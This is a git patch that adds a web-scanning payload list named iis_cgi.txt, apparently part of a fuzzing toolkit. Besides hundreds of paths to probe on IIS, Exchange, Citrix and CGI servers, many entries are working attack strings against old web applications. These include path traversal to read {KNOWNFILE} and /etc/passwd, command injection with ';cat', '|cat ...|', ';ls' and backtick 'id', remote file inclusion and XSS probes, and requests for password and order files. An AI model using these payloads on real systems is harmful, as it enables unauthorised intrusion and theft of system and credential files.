From af88d04fb42abfe1017c591adf1905389b3a94a7 Mon Sep 17 00:00:00 2001 From: InfoSec <1241112575@qq.com> Date: Sun, 7 Aug 2016 16:00:09 +0800 Subject: [PATCH] Add files via upload --- payloads/directory/iis_cgi.txt | 642 +++++++++++++++++++++++++++++++++ 1 file changed, 642 insertions(+) create mode 100644 payloads/directory/iis_cgi.txt diff --git a/payloads/directory/iis_cgi.txt b/payloads/directory/iis_cgi.txt new file mode 100644 index 0000000..41fae54 --- /dev/null +++ b/payloads/directory/iis_cgi.txt @@ -0,0 +1,642 @@ +/.printer +/%NETHOOD%/ +/.aspx +/AccessPlatform/ +/AccessPlatform/auth/ +/AccessPlatform/auth/clientscripts/cookies.js +/AccessPlatform/auth/clientscripts/login.js +/Exadmin/ +/ExchWeb/ +/Exchange/ +/Microsoft-Server-ActiveSync/ +/OMA/ +/OWA/ +/Public/ +/_layouts/alllibs.htm +/_layouts/settings.htm +/_layouts/userinfo.htm +/_vti_bin/ +/_vti_bin/_vti_aut/fp30reg.dll +/_vti_pvt/ +/_WEB_INF/ +/a%5c.aspx +/adovbs.inc +/aspnet_files/ +/certcontrol/ +/certenroll/ +/certsrv/ +/citrix/ +/citrix/AccessPlatform/auth/ +/citrix/AccessPlatform/auth/clientscripts/ +/AccessPlatform/auth/clientscripts/ +/Citrix//AccessPlatform/auth/clientscripts/cookies.js +/Citrix/AccessPlatform/auth/clientscripts/login.js +/Citrix/PNAgent/config.xml +/exchange/root.asp +/forum.asp +/forum_arc.asp +/forum_professionnel.asp +/iisadmin/ +/iisadmpwd/achg.htr +/iisadmpwd/aexp.htr +/iisadmpwd/aexp2.htr +/iisadmpwd/aexp2b.htr +/iisadmpwd/aexp3.htr +/iisadmpwd/aexp4.htr +/iisadmpwd/aexp4b.htr +/iisadmpwd/anot.htr +/iisadmpwd/anot3.htr +/iiasdmpwd/ +/iishelp/ +/iishelp/iis/misc/default.asp +/iissamples/ +/imprimer.asp +/includes/adovbs.inc +/msadc/ +/null.htw +/pbserver/pbserver.dll +/postinfo.html +/rubrique.asp +/scripts/ +/scripts/fpcount.exe +/scripts/cgimail.exe +/scripts/tools/newdsn.exe +/scripts/tools/getdrvs.exe +/scripts/convert.bas +/cgi-bin/htmlscript +/scripts/counter.exe +/scripts/no-such-file.pl +/share/ +/tsweb/ +/~/.asp +/~/.aspx +/index.shtml +/x.htw +/x.ida +/x.idq +/cgi +/scripts/iisadmin/ism.dll?http/dir +/scripts/samples/search/webhits.exe +%2e%2e/abyss.conf +.access +.cobalt +.cobalt/alert/service.cgi?service= +.cobalt/alert/service.cgi?service= +.fhp +.htaccess +.htaccess.old +.htaccess.save +.htaccess~ +.htpasswd +.nsconfig +.passwd +.www_acl +.wwwacl +/_vti_pvt/doctodep.btr +14all-1.1.cgi?cfg=../../../../../../../..{KNOWNFILE} +14all.cgi?cfg=../../../../../../../..{KNOWNFILE} +AT-admin.cgi +AT-generate.cgi +Album?mode=album&album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&dispsize=640&start=0 +AnyBoard.cgi +AnyForm +AnyForm2 +Backup/add-passwd.cgi +C +Count.cgi +DC +DCFORM +File +FormHandler.cgi?realname=aaa&email=aaa&reply_message_template=%2Fetc%2Fpasswd&reply_message_from=sq%40example.com&redirect=http%3A%2F%2Fwww.example.com&recipient=sq%40example.com +FormMail.cgi? +a1disp3.cgi?../../../../../../../../../..{KNOWNFILE} +a1stats/a1disp3.cgi?../../../../../../../../../..{KNOWNFILE} +a1stats/a1disp3.cgi?../../../../../../..{KNOWNFILE} +a1stats/a1disp4.cgi?../../../../../../..{KNOWNFILE} +add_ftp.cgi +addbanner.cgi +adduser.cgi +admin.cgi +admin.cgi?list=../../../../../../../../../..{KNOWNFILE} +admin.php +admin.php3 +admin.pl +adminhot.cgi +adminwww.cgi +af.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd +aglimpse +aglimpse.cgi +alibaba.pl|dir%20..\\..\\..\\..\\..\\..\\..\\, +alienform.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd +amadmin.pl +anacondaclip.pl?template=../../../../../../../../../..{KNOWNFILE} +ans.pl?p=../../../../../usr/bin/id|&blah +ans/ans.pl?p=../../../../../usr/bin/id|&blah +anyboard.cgi +archie +architext_query.cgi +architext_query.pl +ash +astrocam.cgi +atk/javascript/class.atkdateattribute.js.php?config_atkroot=@RFIURL +auction/auction.cgi?action= +auctiondeluxe/auction.pl +auktion.cgi?menue=../../../../../../../../../..{KNOWNFILE} +auth_data/auth_user_file.txt +awl/auctionweaver.pl +awstats.pl +awstats/awstats.pl +ax-admin.cgi +ax.cgi +axs.cgi +badmin.cgi +banner.cgi +bannereditor.cgi +bash +bb-hist?HI +bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK +bbcode_ref.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK +bbs_forum.cgi +betsie/parserl.pl/; +bigconf.cgi?command=view_textfile&file={KNOWNFILE}&filters= +bizdb1-search.cgi +blog/ +blog/mt-check.cgi +blog/mt-load.cgi +blog/mt.cfg +bnbform +bnbform.cgi +book.cgi?action=default¤t=|cat%20{KNOWNFILE}|&form_tid=996604045&prev=main.html&list_message_index=10 +boozt/admin/index.cgi?section=5&input=1 +bsguest.cgi?email=x;ls +bslist.cgi?email=x;ls +build.cgi +bulk/bulk.cgi +c_download.cgi +cached_feed.cgi +cachemgr.cgi +cal_make.pl?p0=../../../../../../../../../..{KNOWNFILE}%00 +calendar +calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22 +calendar.pl +calendar/calendar_admin.pl?config=|cat%20{KNOWNFILE}| +calendar/index.cgi +calendar_admin.pl?config=|cat%20{KNOWNFILE}| +calender_admin.pl +campas?%0acat%0a{KNOWNFILE}%0a +cart.pl +cart.pl?db=' +cartmanager.cgi +cbmc/forums.cgi +ccbill-local.cgi?cmd=MENU +ccbill-local.pl?cmd=MENU +cgforum.cgi +cgi-lib.pl +cgicso?query= +cgicso?query=AAA +cgiforum.pl?thesection=../../../../../../../../../..{KNOWNFILE}%00 +cgiwrap +cgiwrap/%3Cfont%20color=red%3E +cgiwrap/~@U +cgiwrap/~JUNK(5) +cgiwrap/~root +change-your-password.pl +classified.cgi +classifieds +classifieds.cgi +classifieds/classifieds.cgi +classifieds/index.cgi +clickcount.pl?view=test +clickresponder.pl +code.php +code.php3 +com5..........................................................................................................................................................................................................................box +com5.java +com5.pl +commandit.cgi +commerce.cgi?page=../../../../../../../../../..{KNOWNFILE}%00index.html +common.php?f=0&ForumLang=../../../../../../../../../..{KNOWNFILE} +common/listrec.pl +common/listrec.pl?APP=qmh-news&TEMPLATE=;ls%20/etc| +compatible.cgi +count.cgi +counter-ord +counterbanner +counterbanner-ord +counterfiglet-ord +counterfiglet/nc/ +cs +csChatRBox.cgi?command=savesetup&setup=;system('cat%20{KNOWNFILE}') +csGuestBook.cgi?command=savesetup&setup=;system('cat%20{KNOWNFILE}') +csLive +csNews.cgi +csNewsPro.cgi?command=savesetup&setup=;system('cat%20{KNOWNFILE}') +csPassword.cgi +csPassword/csPassword.cgi +csh +cstat.pl +cutecast/members/ +cvsblame.cgi?file= +cvslog.cgi?file=*&rev=&root= +cvslog.cgi?file= +cvsquery.cgi?branch=&file=&date= +cvsquery.cgi?module=&branch=&dir=&file=&who=&sortby=Date&hours=2&date=week +cvsqueryform.cgi?cvsroot=/cvsroot&module=&branch=HEAD +dansguardian.pl?DENIEDURL= +dasp/fm_shell.asp +data/fetch.php?page= +date +day5datacopier.cgi +day5datanotifier.cgi +db2www/library/document.d2w/show +db4web_c/dbdirname/{KNOWNFILE} +db_manager.cgi +dbman/db.cgi?db=no-db +dcforum.cgi?az=list&forum=../../../../../../../../../..{KNOWNFILE}%00 +dcshop/auth_data/auth_user_file.txt +dcshop/orders/orders.txt +dfire.cgi +diagnose.cgi +dig.cgi +directorypro.cgi?want=showcat&show=../../../../../../../../../..{KNOWNFILE}%00 +displayTC.pl +dnewsweb +donothing +dose.pl?daily&somefile.txt&|ls| +download.cgi +dumpenv.pl +edit.pl +empower?DB=whateverwhatever +emu/html/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00 +emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00 +emumail/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00 +enter.cgi +environ.cgi +environ.pl +environ.pl?param1= +erba/start/%3Cscript%3Ealert('XSS');%3C/script%3E +eshop.pl/seite=;cat%20eshop.pl| +ex-logger.pl +excite +excite;IF +ezadmin.cgi +ezboard.cgi +ezman.cgi +ezshopper/loadpage.cgi?user_id=1&file=|cat%20{KNOWNFILE}| +ezshopper/search.cgi?user_id=id&database=dbase1.exm&template=../../../../../../..{KNOWNFILE}&distinct=1 +ezshopper2/loadpage.cgi +ezshopper3/loadpage.cgi +faqmanager.cgi?toc={KNOWNFILE}%00 +faxsurvey?cat%20{KNOWNFILE} +filemail +filemail.pl +finger +finger.pl +flexform +flexform.cgi +fom.cgi?file= +fom/fom.cgi?cmd=&file=1&keywords=vulnerable +formmail +formmail.cgi +formmail.cgi?recipient=root@localhost%0Acat%20{KNOWNFILE}&email=joeuser@localhost&subject=test +formmail.pl +formmail.pl?recipient=root@localhost%0Acat%20{KNOWNFILE}&email=joeuser@localhost&subject=test +formmail?recipient=root@localhost%0Acat%20{KNOWNFILE}&email=joeuser@localhost&subject=test +fortune +ftp.pl +ftpsh +gH.cgi +gbadmin.cgi?action=change_adminpass +gbadmin.cgi?action=change_automail +gbadmin.cgi?action=colors +gbadmin.cgi?action=setup +gbook/gbook.cgi?_MAILTO=xx;ls +gbpass.pl +generate.cgi?content=../../../../../../../../../../windows/win.ini%00board=board_1 +generate.cgi?content=../../../../../../../../../../winnt/win.ini%00board=board_1 +generate.cgi?content=../../../../../../../../../..{KNOWNFILE}%00board=board_1 +getdoc.cgi +gettransbitmap +glimpse +gm-authors.cgi +gm-cplog.cgi +gm.cgi +guestbook.cgi +guestbook.cgi?user=cpanel&template=|/bin/cat%20{KNOWNFILE}| +guestbook.pl +guestbook/passwd +handler.cgi +hitview.cgi +horde/test.php +horde/test.php?mode=phpinfo +hsx.cgi?show=../../../../../../../../../../..{KNOWNFILE}%00 +htgrep?file=index.html&hdr={KNOWNFILE} +html2chtml.cgi +html2wml.cgi +htmlscript?../../../../../../../../../..{KNOWNFILE} +htsearch.cgi?words=%22%3E%3Cscript%3Ealert%'XSS'%29%3B%3C%2Fscript%3E +htsearch?-c/nonexistant +htsearch?config=foofighter&restrict=&exclude=&method=and&format=builtin-long&sort=score&words= +htsearch?exclude=%60{KNOWNFILE}%60 +ibill.pm +icat +if/admin/nph-build.cgi +ikonboard/help.cgi? +imageFolio.cgi +imagefolio/admin/admin.cgi +imagemap +include/new-visitor.inc.php +index.js0x70 +index.pl +info2www +info2www '(../../../../../../../bin/mail root <{KNOWNFILE}> +infosrch.cgi +ion-p?page=../../../../..{KNOWNFILE} +jailshell +jj +journal.cgi?folder=journal.cgi%00 +ksh +lastlines.cgi?process +listrec.pl +loadpage.cgi?user_id=1&file=../../../../../../../../../..{KNOWNFILE} +loadpage.cgi?user_id=1&file=..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini +log-reader.cgi +log/ +log/nether-log.pl?checkit +login.cgi +login.pl +login.pl?course_id=\ +logit.cgi +logs.pl +logs/ +logs/access_log +logs/error_log +lookwho.cgi +ls +lwgate +lwgate.cgi +magiccard.cgi?pa=3Dpreview&next=3Dcustom&page=3D../../../../../../../../../..{KNOWNFILE} +mail +mail/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00 +mail/nph-mr.cgi?do=loginhelp&configLanguage=../../../../../../..{KNOWNFILE}%00 +mailit.pl +maillist.cgi +maillist.pl +mailnews.cgi +main.cgi?board=FREE_BOARD&command=down_load&filename=../../../../../../../../../..{KNOWNFILE} +majordomo.pl +man2html +mastergate/search.cgi?search=0&search_on=all +meta.pl +mgrqcgi +mini_logger.cgi +mmstdod.cgi +moin.cgi?test +mojo/mojo.cgi +mrtg.cfg?cfg=../../../../../../../..{KNOWNFILE} +mrtg.cgi?cfg=../../../../../../../..{KNOWNFILE} +mrtg.cgi?cfg=blah +ms_proxy_auth_query/ +mt-static/ +mt-static/mt-check.cgi +mt-static/mt-load.cgi +mt-static/mt.cfg +mt/ +mt/mt-check.cgi +mt/mt-load.cgi +mt/mt.cfg +multihtml.pl?multi={KNOWNFILE}%00html +musicqueue.cgi +myguestbook.cgi?action=view +namazu.cgi +nbmember.cgi?cmd=list_all_users +netauth.cgi?cmd=show&page=../../../../../../../../../..{KNOWNFILE} +netpad.cgi +newsdesk.cgi?t=../../../../../../../../../..{KNOWNFILE} +nimages.php +nlog-smb.cgi +nlog-smb.pl +non-existent.pl +noshell +nph-emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00 +nph-error.pl +nph-exploitscanget.cgi +nph-maillist.pl +nph-publish +nph-publish.cgi +nph-showlogs.pl?files=../../&filter=.*&submit=Go&linecnt=500&refresh=0 +nph-test-cgi +ntitar.pl +opendir.php?{KNOWNFILE} +orders/orders.txt +pagelog.cgi +pals-cgi?palsAction=restart&documentName={KNOWNFILE} +parse-file +pass +passwd +passwd.txt +password +pbcgi.cgi?name=Joe%Camel&email=%3C +perl +perl?-v +perlshop.cgi +pfdispaly.cgi?'%0A/bin/cat%20{KNOWNFILE}|' +pfdispaly.cgi?../../../../../../../../../..{KNOWNFILE} +pfdisplay.cgi?'%0A/bin/cat%20{KNOWNFILE}|' +phf +phf.cgi?QALIA +phf?Qname=root%0Acat%20{KNOWNFILE}%20 +photo/ +photo/manage.cgi +photo/protected/manage.cgi +php-cgi +php.cgi?{KNOWNFILE} +plusmail +pollit/Poll_It_ +pollssi.cgi +post-query +post_query +postcards.cgi +powerup/r.cgi?FILE=../../../../../../../../../..{KNOWNFILE} +printenv +printenv.tmp +probecontrol.cgi?command=enable&username=cancer&password=killer +processit.pl +profile.cgi +pu3.pl +publisher/search.cgi?dir=jobs&template=;cat%20{KNOWNFILE}|&output_number=10 +query +query?mss=%2e%2e/config +quickstore.cgi?page=../../../../../../../../../..{KNOWNFILE}%00html&cart_id= +quikstore.cfg +quizme.cgi +r.cgi?FILE=../../../../../../../../../..{KNOWNFILE} +ratlog.cgi +redirect +register.cgi +replicator/webpage.cgi/ +responder.cgi +retrieve_password.pl +rksh +rmp_query +robadmin.cgi +robpoll.cgi +rpm_query +rsh +rtm.log +rwcgi60 +rwcgi60/showenv +rwwwshell.pl +sawmill5?rfcf+%22{KNOWNFILE}%22+spbn+1,1,21,1,1,1,1 +sawmill?rfcf+%22 +sbcgi/sitebuilder.cgi +scoadminreg.cgi +scripts/*%0a.pl +search.cgi +search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini +search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini +search.php?searchstring= +search.pl +search.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank= +search.pl?form=../../../../../../../../../..{KNOWNFILE}%00 +search/search.cgi?keys=*&prc=any&catigory=../../../../../../../../../../../../etc +sendform.cgi +sendpage.pl?message=test\;/bin/ls%20/etc;echo%20\message +sendtemp.pl?templ=../../../../../../../../../..{KNOWNFILE} +session/adminlogin +sewse?/home/httpd/html/sewse/jabber/comment2.jse+{KNOWNFILE} +sh +shop.cgi?page=../../../../../../..{KNOWNFILE} +shop.pl/page=;cat%20shop.pl| +shop/auth_data/auth_user_file.txt +shop/orders/orders.txt +shopper.cgi?newpage=../../../../../../../../../..{KNOWNFILE} +shopplus.cgi?dn=domainname.com&cartid=%CARTID%&file=;cat%20{KNOWNFILE}| +show.pl +showcheckins.cgi?person= +showuser.cgi +simple/view_page?mv_arg=|cat%20{KNOWNFILE}| +simplestguest.cgi +simplestmail.cgi +smartsearch.cgi?keywords=|/bin/cat%20{KNOWNFILE}| +smartsearch/smartsearch.cgi?keywords=|/bin/cat%20{KNOWNFILE}| +sojourn.cgi?cat=../../../../../../../../../../etc/password%00 +spin_client.cgi?aaaaaaaa +ss +sscd_suncourier.pl +ssi//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e{KNOWNFILE} +start.cgi/%3Cscript%3Ealert('XSS');%3C/script%3E +stat.pl +stat/ +stats-bin-p/reports/index.html +stats.pl +stats.prf +stats/ +stats/statsbrowse.asp?filepath=c:\&Opt=3 +stats_old/ +statsconfig +statusconfig.pl +statview.pl +store.cgi? +store/agora.cgi?cart_id= +store/agora.cgi?page=whatever33.html +store/index.cgi?page=../../../../../../../..{KNOWNFILE} +story.pl?next=../../../../../../../../../..{KNOWNFILE}%00 +story/story.pl?next=../../../../../../../../../..{KNOWNFILE}%00 +survey +survey.cgi +sws/admin.html +sws/manager.pl +tablebuild.pl +talkback.cgi?article=../../../../../../../..{KNOWNFILE}%00&action=view&matchview=1 +tcsh +technote/main.cgi?board=FREE_BOARD&command=down_load&filename=/../../../../../../../../../..{KNOWNFILE} +test-cgi.tcl +test-cgi?/* +test-env +test.cgi +test/test.cgi +texis/junk +texis/phine +textcounter.pl +tidfinder.cgi +tigvote.cgi +title.cgi +tpgnrock +traffic.cgi?cfg=../../../../../../../..{KNOWNFILE} +troops.cgi +ttawebtop.cgi/?action=start&pg=../../../../../../../../../..{KNOWNFILE} +ultraboard.cgi +ultraboard.pl +unlg1.1 +unlg1.2 +update.dpgs +upload.cgi +uptime +urlcount.cgi?%3CIMG%20 +ustorekeeper.pl?command=goto&file=../../../../../../../../../..{KNOWNFILE} +utm/admin +utm/utm_stat +view-source +view-source?view-source +view_item?HTML_FILE=../../../../../../../../../..{KNOWNFILE}%00 +viewcvs.cgi/viewcvs/?cvsroot= +viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\ +viewlogs.pl +viewsource?{KNOWNFILE} +viralator.cgi +virgil.cgi +vote.cgi +vpasswd.cgi +vq/demos/respond.pl? +w3-msql +w3-sql +wais.pl +way-board.cgi?db={KNOWNFILE}%00 +way-board/way-board.cgi?db={KNOWNFILE}%00 +webais +webbbs.cgi +webbbs/webbbs_config.pl?name=joe&email=test@example.com&body=aaaaffff&followup=10;cat%20{KNOWNFILE} +webcart/webcart.cgi?CONFIG=mountain&CHANGE=YE +webdist.cgi?distloc=;cat%20{KNOWNFILE} +webdriver +webgais +webif.cgi +webmail/html/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00 +webmap.cgi +webnews.pl +webplus?about +webplus?script=../../../../../../../../../..{KNOWNFILE} +websendmail +webspirs.cgi?sp.nextform=../../../../../../../../../..{KNOWNFILE} +webutil.pl +webutils.pl +webwho.pl +where.pl?sd=ls%20/etc +whois.cgi?action=load&whois=%3Bid +whois.cgi?lookup=;&ext=/bin/cat%20{KNOWNFILE} +whois/whois.cgi?lookup=;&ext=/bin/cat%20{KNOWNFILE} +whois_raw.cgi?fqdn=%0Acat%20{KNOWNFILE} +windmail +wrap +wrap.cgi +ws_ftp.ini +www-sql +wwwadmin.pl +wwwboard.cgi.cgi +wwwboard.pl +wwwstats.pl +wwwthreads/3tvars.pm +wwwthreads/w3tvars.pm +wwwwais +zml.cgi?file=../../../../../../../../../..{KNOWNFILE}%00 +zsh \ No newline at end of file